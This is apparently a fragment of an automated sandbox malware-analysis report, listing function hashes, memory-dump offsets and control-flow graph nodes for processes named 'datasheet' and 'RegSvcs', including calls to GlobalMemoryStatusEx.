                                                            • Opcode ID: f197d525734a4585737f1e3ced45c1c4d02780265c7e1dc23631b2bbe27f2276
                                                            • Instruction ID: 2bb5e333c49b71f50d71664da416c6be08fca5b9a78265bab1aafbab9d6bbc72
                                                            • Opcode Fuzzy Hash: f197d525734a4585737f1e3ced45c1c4d02780265c7e1dc23631b2bbe27f2276
                                                            • Instruction Fuzzy Hash: 1F01267100C344DAE7108E25CD80BA6FF98EF41324F18D49BED082A386C7B99841C6B2
                                                            Function 00EDD758 Relevance: .0, Instructions: 36COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2184280984.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_edd000_datasheet.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 935b50d2043f1adc9ac80f664e9d09ed010fb2831ce2b22fd46cd136fc00f9c0
                                                            • Instruction ID: 0743d5fce9de8940de4f1ce76595fb253cebe10ce20ea7f1bbf20e52c899126b
                                                            • Opcode Fuzzy Hash: 935b50d2043f1adc9ac80f664e9d09ed010fb2831ce2b22fd46cd136fc00f9c0
                                                            • Instruction Fuzzy Hash: F2F062714093449EE7108E16DD84B66FFA8EF91729F18C45BED085B386C379A845CAB1

                                                            Non-executed Functions

                                                            Function 0724B650 Relevance: .3, Instructions: 312COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193016632.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7240000_datasheet.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f83a18947dd8ba5b0df6de1b48e5ba50918fe01091d53c75165c64ee138ee099
                                                            • Instruction ID: 8a88b7d372dfa49f47ac188152f4553ce84893e25500d825b190d10e95b88b6a
                                                            • Opcode Fuzzy Hash: f83a18947dd8ba5b0df6de1b48e5ba50918fe01091d53c75165c64ee138ee099
                                                            • Instruction Fuzzy Hash: 13E11BB4E102598FDB14DFA9C580AAEFBF2FF49305F248269D415AB355D730A942CF60
                                                            Function 0724C360 Relevance: .3, Instructions: 312COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193016632.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7240000_datasheet.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c3b1ef71bd2247b78c7cc0d85ece020a3c3ecdc77af3757b2c383508c10ccb43
                                                            • Instruction ID: 751c1fe37be518ac817a85b39611c75348be10ecd3114c00ff18b34e7cb572a7
                                                            • Opcode Fuzzy Hash: c3b1ef71bd2247b78c7cc0d85ece020a3c3ecdc77af3757b2c383508c10ccb43
                                                            • Instruction Fuzzy Hash: 39E12EB4E112598FDB14DFA9C580AAEFBF2FF89305F248169D405AB355D730A982CF60
                                                            Function 0724BF28 Relevance: .3, Instructions: 312COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193016632.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7240000_datasheet.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f6455ec3db446fc3d9854955b5d4f38efdb54a8e10fc53dd8535185df76528fb
                                                            • Instruction ID: aced35a329189f5f8581f46d8e7afbc38280188f5ec2a6090b666a4b0ef48374
                                                            • Opcode Fuzzy Hash: f6455ec3db446fc3d9854955b5d4f38efdb54a8e10fc53dd8535185df76528fb
                                                            • Instruction Fuzzy Hash: C7E13EB4E111598FDB14DFA8C580AAEFBF2FF49304F248169D405AB355D770A982CF60
                                                            Function 07249F48 Relevance: .3, Instructions: 312COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193016632.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7240000_datasheet.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f2d163646851a16548a7b2c7e36b0b95fc2a12dadb59164171f93efafb1ea92c
                                                            • Instruction ID: 2e9ace81bb08e33ca4497035920e9d0516c8003ac9a97e66ad8032c18db5911e
                                                            • Opcode Fuzzy Hash: f2d163646851a16548a7b2c7e36b0b95fc2a12dadb59164171f93efafb1ea92c
                                                            • Instruction Fuzzy Hash: 58E12BB4E102598FDB14DFA8C580AAEFBB2FF89305F24C169D405AB355DB71A942CF60
                                                            Function 07249B10 Relevance: .3, Instructions: 312COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193016632.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7240000_datasheet.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 573d35aac4f37321c1a2a7e4a5c97f4ecaf03fbb88a0b69c60a7be90e8a1b2e4
                                                            • Instruction ID: 6639197d335c090b6cc406ff9d567b68d3db83fef2008f912fc1e7bc3cc612a9
                                                            • Opcode Fuzzy Hash: 573d35aac4f37321c1a2a7e4a5c97f4ecaf03fbb88a0b69c60a7be90e8a1b2e4
                                                            • Instruction Fuzzy Hash: E3E13CB4E102598FDB14DF99C580AAEFBF2FF89305F248169D445AB355D730A982CF60
                                                            Function 07C03548 Relevance: .3, Instructions: 298COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193299094.0000000007C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7c00000_datasheet.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cefca3dd534aab6171bb5d0b0e9921c6f199a27b7b5f0bd24c42fca5a283ebd8
                                                            • Instruction ID: 89cdac9a9af734fc74e82d4283071bd4f32a19a0c89cfa8cac2602471dcf066f
                                                            • Opcode Fuzzy Hash: cefca3dd534aab6171bb5d0b0e9921c6f199a27b7b5f0bd24c42fca5a283ebd8
                                                            • Instruction Fuzzy Hash: 93D1D4B4A00545CFDB08DF69C598AA9B7F1BF8D711F2580A9E505AB3B1DB31AD40CFA0
                                                            Function 072416E8 Relevance: .3, Instructions: 267COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193016632.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7240000_datasheet.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1727de278823a49671b3378d6b853da515a384c551b59af01c1b1f5893237ec5
                                                            • Instruction ID: a96add8477b7f1007d1841584dc8d87cd87e26f76714b72b88e2787545477e89
                                                            • Opcode Fuzzy Hash: 1727de278823a49671b3378d6b853da515a384c551b59af01c1b1f5893237ec5
                                                            • Instruction Fuzzy Hash: 33D12631D2075ACADB00EBA4D8A4699B7B1FF95300F51C79AE00937225EFB06AC4CF91
                                                            Function 02B3DF64 Relevance: .3, Instructions: 264COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2186042993.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2b30000_datasheet.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ff2160b2c91dabf3f18a07282bd98d3d85afe1abb1fcfb3c116700b581d73488
                                                            • Instruction ID: 289fd4b414c05448ee39c2022c6d4a6dce0632c697c1ad40e7ca50f131fc5749
                                                            • Opcode Fuzzy Hash: ff2160b2c91dabf3f18a07282bd98d3d85afe1abb1fcfb3c116700b581d73488
                                                            • Instruction Fuzzy Hash: EAA15F36E0061ACFCF16DFB4C4845AEB7B2FF84304B1545AAE805AB265DB71E956CF80
                                                            Function 072416F8 Relevance: .3, Instructions: 264COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193016632.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7240000_datasheet.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4ae0b133710d38fbc0aecb6500dcc850fb1d7088ff2f241084165c669e68db7d
                                                            • Instruction ID: 967f5c5f2081803e46991b5f8f87811aeae23ffa8304eb256609a813f0d8a547
                                                            • Opcode Fuzzy Hash: 4ae0b133710d38fbc0aecb6500dcc850fb1d7088ff2f241084165c669e68db7d
                                                            • Instruction Fuzzy Hash: 7CD11531D2075ACADB00EBA4D8A4699B7B1FF95300F51D79AE00937225EFB06AC5CF91
                                                            Function 0724BF17 Relevance: .1, Instructions: 132COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193016632.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7240000_datasheet.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 94d6d6ce98935e2c1af1493d49f9912aff24282f00c498a08c890830917ce5e3
                                                            • Instruction ID: 068a1a8e4a703ee231efac023a759dca7b81f155431bf1d0f66d07591ec8069f
                                                            • Opcode Fuzzy Hash: 94d6d6ce98935e2c1af1493d49f9912aff24282f00c498a08c890830917ce5e3
                                                            • Instruction Fuzzy Hash: 91514FB5E102598FDB18CFA9C5446AEFBF2FF89304F248169D418AB355D7319982CFA0
                                                            Function 07249B08 Relevance: .1, Instructions: 131COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193016632.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7240000_datasheet.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 86413d1269d8ad99c92cdcdc09da2868b3490434ec2acea5a152ac966a4210fa
                                                            • Instruction ID: 50c6322670608dc40b9312a1bfdbe212dc471ce53c64cbc19dc065da82d6ae8b
                                                            • Opcode Fuzzy Hash: 86413d1269d8ad99c92cdcdc09da2868b3490434ec2acea5a152ac966a4210fa
                                                            • Instruction Fuzzy Hash: 595141B4E102198FDB14CFA9C5806AEFBF6FF89304F248169D458AB355D730A982CF60
                                                            Function 07C00007 Relevance: .1, Instructions: 98COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193299094.0000000007C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7c00000_datasheet.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4cd114d85cc9ee0876660589b481dc68ee1919aafa262f1a38a3f70577a65906
                                                            • Instruction ID: 5489ec0c095b5acb5690e2faf45e7626ae1edc9da1db3886a49b39f5f9e3e573
                                                            • Opcode Fuzzy Hash: 4cd114d85cc9ee0876660589b481dc68ee1919aafa262f1a38a3f70577a65906
                                                            • Instruction Fuzzy Hash: 19313DB1D093988BEB15CF6798543D9BBF6AF86310F15C0EAC44CA6151DB740A89CF91

                                                            Execution Graph

                                                            Execution Coverage:11.4%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:11
                                                            Total number of Limit Nodes:2
                                                            execution_graph 21932 15f7ea8 21933 15f7eb2 21932->21933 21934 15f7ecc 21933->21934 21937 6acda90 21933->21937 21941 6acdaa0 21933->21941 21939 6acdab5 21937->21939 21938 6acdcca 21938->21934 21939->21938 21940 6acdce1 GlobalMemoryStatusEx 21939->21940 21940->21939 21943 6acdab5 21941->21943 21942 6acdcca 21942->21934 21943->21942 21944 6acdce1 GlobalMemoryStatusEx 21943->21944 21944->21943

                                                            Executed Functions

                                                            Function 015FAA22 Relevance: 2.7, Instructions: 2741COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 49c1fa7e0c4e008cece7df58604a566ff754c3541630532d45e8f9ce3841ad31
                                                            • Instruction ID: 2cf7faa944f879dd1f512c91b0434bc30cf518cc0a72b21bbead39862cfa45fa
                                                            • Opcode Fuzzy Hash: 49c1fa7e0c4e008cece7df58604a566ff754c3541630532d45e8f9ce3841ad31
                                                            • Instruction Fuzzy Hash: 8553E531C10B5A8ADB51EF68C8805A9F7B1FF99300F15D79AE4587B121FB70AAC5CB81
                                                            Function 015F3E70 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 586 15f3e70-15f3ed6 588 15f3ed8-15f3ee3 586->588 589 15f3f20-15f3f22 586->589 588->589 591 15f3ee5-15f3ef1 588->591 590 15f3f24-15f3f7c 589->590 600 15f3f7e-15f3f89 590->600 601 15f3fc6-15f3fc8 590->601 592 15f3f14-15f3f1e 591->592 593 15f3ef3-15f3efd 591->593 592->590 595 15f3eff 593->595 596 15f3f01-15f3f10 593->596 595->596 596->596 597 15f3f12 596->597 597->592 600->601 603 15f3f8b-15f3f97 600->603 602 15f3fca-15f3fe2 601->602 610 15f402c-15f402e 602->610 611 15f3fe4-15f3fef 602->611 604 15f3fba-15f3fc4 603->604 605 15f3f99-15f3fa3 603->605 604->602 607 15f3fa7-15f3fb6 605->607 608 15f3fa5 605->608 607->607 609 15f3fb8 607->609 608->607 609->604 613 15f4030-15f407e 610->613 611->610 612 15f3ff1-15f3ffd 611->612 614 15f3fff-15f4009 612->614 615 15f4020-15f402a 612->615 621 15f4084-15f4092 613->621 617 15f400d-15f401c 614->617 618 15f400b 614->618 615->613 617->617 619 15f401e 617->619 618->617 619->615 622 15f409b-15f40fb 621->622 623 15f4094-15f409a 621->623 630 15f40fd-15f4101 622->630 631 15f410b-15f410f 622->631 623->622 630->631 632 15f4103 630->632 633 15f411f-15f4123 631->633 634 15f4111-15f4115 631->634 632->631 636 15f4125-15f4129 633->636 637 15f4133-15f4137 633->637 634->633 635 15f4117-15f411a call 15f0ab8 634->635 635->633 636->637 639 15f412b-15f412e call 15f0ab8 636->639 640 15f4139-15f413d 637->640 641 15f4147-15f414b 637->641 639->637 640->641 643 15f413f-15f4142 call 15f0ab8 640->643 644 15f414d-15f4151 641->644 645 15f415b-15f415f 641->645 643->641 644->645 646 15f4153 644->646 647 15f416f 645->647 648 15f4161-15f4165 645->648 646->645 651 15f4170 647->651 648->647 650 15f4167 648->650 650->647 651->651
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: \V[n
                                                            • API String ID: 0-1005319620
                                                            • Opcode ID: 128efc9b11de68246af2a50dc4508c9527b968f22c9fc1bd2cc14851d8266b3f
                                                            • Instruction ID: 0ac14fb198904501f1da1abeafe59d66979f67c77680d6b1b07dd1ffb152d1e1
                                                            • Opcode Fuzzy Hash: 128efc9b11de68246af2a50dc4508c9527b968f22c9fc1bd2cc14851d8266b3f
                                                            • Instruction Fuzzy Hash: E2917070E00209CFEF14CFA9C99179EBBF2BF88714F14812DE515AB254EB749845CB81
                                                            Function 015F4A88 Relevance: .3, Instructions: 266COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 240dfd33214f3a6306e3aab77d52adfcbb2277c6b75fe5405c885c07b9cd6810
                                                            • Instruction ID: 11970d30e8f56864c94d8cc3b6b126af7f8ab3c72dea0ba09f8b50eb128dc98a
                                                            • Opcode Fuzzy Hash: 240dfd33214f3a6306e3aab77d52adfcbb2277c6b75fe5405c885c07b9cd6810
                                                            • Instruction Fuzzy Hash: 17B14A70E006098FEF14CFA9C8957AEBBF2BF88714F14852DD915EB294EB749845CB81
                                                            Function 015F47F4 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 459 15f47f4-15f488c 462 15f488e-15f4899 459->462 463 15f48d6-15f48d8 459->463 462->463 464 15f489b-15f48a7 462->464 465 15f48da-15f48f2 463->465 466 15f48ca-15f48d4 464->466 467 15f48a9-15f48b3 464->467 472 15f493c-15f493e 465->472 473 15f48f4-15f48ff 465->473 466->465 468 15f48b7-15f48c6 467->468 469 15f48b5 467->469 468->468 471 15f48c8 468->471 469->468 471->466 475 15f4940-15f4952 472->475 473->472 474 15f4901-15f490d 473->474 476 15f490f-15f4919 474->476 477 15f4930-15f493a 474->477 482 15f4959-15f4985 475->482 479 15f491d-15f492c 476->479 480 15f491b 476->480 477->475 479->479 481 15f492e 479->481 480->479 481->477 483 15f498b-15f4999 482->483 484 15f499b-15f49a1 483->484 485 15f49a2-15f49ff 483->485 484->485 492 15f4a0f-15f4a13 485->492 493 15f4a01-15f4a05 485->493 495 15f4a15-15f4a19 492->495 496 15f4a23-15f4a27 492->496 493->492 494 15f4a07-15f4a0a call 15f0ab8 493->494 494->492 495->496 498 15f4a1b-15f4a1e call 15f0ab8 495->498 499 15f4a29-15f4a2d 496->499 500 15f4a37-15f4a3b 496->500 498->496 499->500 504 15f4a2f 499->504 501 15f4a3d-15f4a41 500->501 502 15f4a4b 500->502 501->502 505 15f4a43 501->505 506 15f4a4c 502->506 504->500 505->502 506->506
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: \V[n$\V[n
                                                            • API String ID: 0-3705941238
                                                            • Opcode ID: cb1b7d4b77240d4ce283b652bbf6c082cc2c19fbc5c7dfc03b0555a0d8553420
                                                            • Instruction ID: dc893e5239fb0e3535b892c0e0a938c026e9c0527a3d29894668a168afd2416f
                                                            • Opcode Fuzzy Hash: cb1b7d4b77240d4ce283b652bbf6c082cc2c19fbc5c7dfc03b0555a0d8553420
                                                            • Instruction Fuzzy Hash: CD716970E002498FDB10DFA9D9807EEBBF2BF88714F14812DE555AB254EB749846CF91
                                                            Function 015F4800 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 507 15f4800-15f488c 510 15f488e-15f4899 507->510 511 15f48d6-15f48d8 507->511 510->511 512 15f489b-15f48a7 510->512 513 15f48da-15f48f2 511->513 514 15f48ca-15f48d4 512->514 515 15f48a9-15f48b3 512->515 520 15f493c-15f493e 513->520 521 15f48f4-15f48ff 513->521 514->513 516 15f48b7-15f48c6 515->516 517 15f48b5 515->517 516->516 519 15f48c8 516->519 517->516 519->514 523 15f4940-15f4985 520->523 521->520 522 15f4901-15f490d 521->522 524 15f490f-15f4919 522->524 525 15f4930-15f493a 522->525 531 15f498b-15f4999 523->531 527 15f491d-15f492c 524->527 528 15f491b 524->528 525->523 527->527 529 15f492e 527->529 528->527 529->525 532 15f499b-15f49a1 531->532 533 15f49a2-15f49ff 531->533 532->533 540 15f4a0f-15f4a13 533->540 541 15f4a01-15f4a05 533->541 543 15f4a15-15f4a19 540->543 544 15f4a23-15f4a27 540->544 541->540 542 15f4a07-15f4a0a call 15f0ab8 541->542 542->540 543->544 546 15f4a1b-15f4a1e call 15f0ab8 543->546 547 15f4a29-15f4a2d 544->547 548 15f4a37-15f4a3b 544->548 546->544 547->548 552 15f4a2f 547->552 549 15f4a3d-15f4a41 548->549 550 15f4a4b 548->550 549->550 553 15f4a43 549->553 554 15f4a4c 550->554 552->548 553->550 554->554
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: \V[n$\V[n
                                                            • API String ID: 0-3705941238
                                                            • Opcode ID: c2d8ef33e198104e39135c8106467af56424def08ae3d41cffddc095b5b31431
                                                            • Instruction ID: 7758c8c3568fceb8762472251657daef40d558810a1991f9543280ebde4932c5
                                                            • Opcode Fuzzy Hash: c2d8ef33e198104e39135c8106467af56424def08ae3d41cffddc095b5b31431
                                                            • Instruction Fuzzy Hash: 7F716970E002499FEB14DFA9C9807AEBBF2BF88714F14812DE555AB254EB749846CF81
                                                            Function 06ACEA08 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 555 6acea08-6acea23 556 6acea4d-6acea6c call 6ace180 555->556 557 6acea25-6acea4c call 6acd280 555->557 563 6acea6e-6acea71 556->563 564 6acea72-6acead1 556->564 571 6acead7-6aceb64 GlobalMemoryStatusEx 564->571 572 6acead3-6acead6 564->572 576 6aceb6d-6aceb95 571->576 577 6aceb66-6aceb6c 571->577 577->576
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2226513884.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_6ac0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 18aaddc44331fbcf208a40bb12a505b0fd11b4dae08411d7a5addabbabd5862e
                                                            • Instruction ID: 889b69fe8ff2e30d9e5759e4e78791c54a725467ba83093620e1bbf3bddea42d
                                                            • Opcode Fuzzy Hash: 18aaddc44331fbcf208a40bb12a505b0fd11b4dae08411d7a5addabbabd5862e
                                                            • Instruction Fuzzy Hash: F2413272E0038A9FCB04EB69D8006DEBBF5BF89220F04866AD504A7251DB749845CBA1
                                                            Function 06ACEAF0 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 580 6aceaf0-6aceb2e 581 6aceb36-6aceb64 GlobalMemoryStatusEx 580->581 582 6aceb6d-6aceb95 581->582 583 6aceb66-6aceb6c 581->583 583->582
                                                            APIs
                                                            • GlobalMemoryStatusEx.KERNELBASE ref: 06ACEB57
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2226513884.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_6ac0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID: GlobalMemoryStatus
                                                            • String ID:
                                                            • API String ID: 1890195054-0
                                                            • Opcode ID: 42d45681b33a923375e5beb969848c0c02fb86abf445ee118484eafb8840bce3
                                                            • Instruction ID: ee6be8ee2f984dba5facb4b70687d21c433ef1603fc128470935bba27a8e41cd
                                                            • Opcode Fuzzy Hash: 42d45681b33a923375e5beb969848c0c02fb86abf445ee118484eafb8840bce3
                                                            • Instruction Fuzzy Hash: 241112B1C0065A9BCB10DF9AC844B9EFBF4BF48620F10812AD918B7240D378A950CFA5
                                                            Function 015F3E66 Relevance: 1.5, Strings: 1, Instructions: 237COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 652 15f3e66-15f3ed6 655 15f3ed8-15f3ee3 652->655 656 15f3f20-15f3f22 652->656 655->656 658 15f3ee5-15f3ef1 655->658 657 15f3f24-15f3f7c 656->657 667 15f3f7e-15f3f89 657->667 668 15f3fc6-15f3fc8 657->668 659 15f3f14-15f3f1e 658->659 660 15f3ef3-15f3efd 658->660 659->657 662 15f3eff 660->662 663 15f3f01-15f3f10 660->663 662->663 663->663 664 15f3f12 663->664 664->659 667->668 670 15f3f8b-15f3f97 667->670 669 15f3fca-15f3fe2 668->669 677 15f402c-15f402e 669->677 678 15f3fe4-15f3fef 669->678 671 15f3fba-15f3fc4 670->671 672 15f3f99-15f3fa3 670->672 671->669 674 15f3fa7-15f3fb6 672->674 675 15f3fa5 672->675 674->674 676 15f3fb8 674->676 675->674 676->671 680 15f4030-15f4042 677->680 678->677 679 15f3ff1-15f3ffd 678->679 681 15f3fff-15f4009 679->681 682 15f4020-15f402a 679->682 687 15f4049-15f407e 680->687 684 15f400d-15f401c 681->684 685 15f400b 681->685 682->680 684->684 686 15f401e 684->686 685->684 686->682 688 15f4084-15f4092 687->688 689 15f409b-15f40fb 688->689 690 15f4094-15f409a 688->690 697 15f40fd-15f4101 689->697 698 15f410b-15f410f 689->698 690->689 697->698 699 15f4103 697->699 700 15f411f-15f4123 698->700 701 15f4111-15f4115 698->701 699->698 703 15f4125-15f4129 700->703 704 15f4133-15f4137 700->704 701->700 702 15f4117-15f411a call 15f0ab8 701->702 702->700 703->704 706 15f412b-15f412e call 15f0ab8 703->706 707 15f4139-15f413d 704->707 708 15f4147-15f414b 704->708 706->704 707->708 710 15f413f-15f4142 call 15f0ab8 707->710 711 15f414d-15f4151 708->711 712 15f415b-15f415f 708->712 710->708 711->712 713 15f4153 711->713 714 15f416f 712->714 715 15f4161-15f4165 712->715 713->712 718 15f4170 714->718 715->714 717 15f4167 715->717 717->714 718->718
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: \V[n
                                                            • API String ID: 0-1005319620
                                                            • Opcode ID: 217bc31ad660b4614a72ea1ebf0aecb2bb586ada6ee9f688a28c2c2d2700b653
                                                            • Instruction ID: 325385f5a0550534f406df937bf9ed343882102c3b67c71c81246cb653fbb057
                                                            • Opcode Fuzzy Hash: 217bc31ad660b4614a72ea1ebf0aecb2bb586ada6ee9f688a28c2c2d2700b653
                                                            • Instruction Fuzzy Hash: 78A16C70E00209DFEF10DFA8C981B9EBBF2BF88714F14812DE515AB294EB749845CB91
                                                            Function 015F86F8 Relevance: .6, Instructions: 570COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
